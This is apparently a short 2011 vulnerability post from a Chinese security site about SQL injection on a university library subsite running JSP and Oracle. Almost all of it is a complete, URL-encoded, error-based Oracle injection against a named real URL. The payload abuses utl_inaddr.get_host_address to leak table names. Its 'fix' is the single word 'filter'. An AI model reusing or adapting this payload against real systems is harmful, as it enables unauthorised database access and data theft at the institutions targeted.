频道栏目
首页 > 安全 > 网站安全 > 正文

某大学分站注入漏洞及修复

2011-04-26 12:25:41      个评论      
收藏   我要投稿

简要描述:JSP+ORACLE
详细说明:http://www.lib.tsinghua.edu.cn/homepage/announce_view.jsp?id=2217%27+or+1%3Dutl_inaddr.get_host_address%28%28%28select+distinct+chr%28126%29%7C%7Cchr%2839%29%7C%7Ccast%28table_name+as+char%2850%29%29%7C%7Cchr%2839%29%7C%7Cchr%28126%29+from+%28select+distinct+rownum+r%2Ctable_name+from+all_tables+where+owner<>chr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29+and+owner+<>chr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29%7C%7Cchr%2884%29%7C%7Cchr%2869%29%7C%7Cchr%2877%29+and+owner<>chr%2867%29%7C%7Cchr%2884%29%7C%7Cchr%2888%29%7C%7Cchr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29+and+owner<>chr%2887%29%7C%7Cchr%2877%29%7C%7Cchr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29+and+owner<>chr%2877%29%7C%7Cchr%2868%29%7C%7Cchr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29+and+owner<>chr%2879%29%7C%7Cchr%2876%29%7C%7Cchr%2865%29%7C%7Cchr%2880%29%7C%7Cchr%2883%29%7C%7Cchr%2889%29%7C%7Cchr%2883%29%29where+r%3D21%29%29%29+and+%271%27%3D%271

漏洞证明:

\
 

修复:过滤

相关TAG标签 漏洞 分站 大学
上一篇:ReportAll ActiveX控件任意文件覆盖漏洞及修复方案
下一篇:DaWei 大维团购导航程序变量未初值化漏洞及修复
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站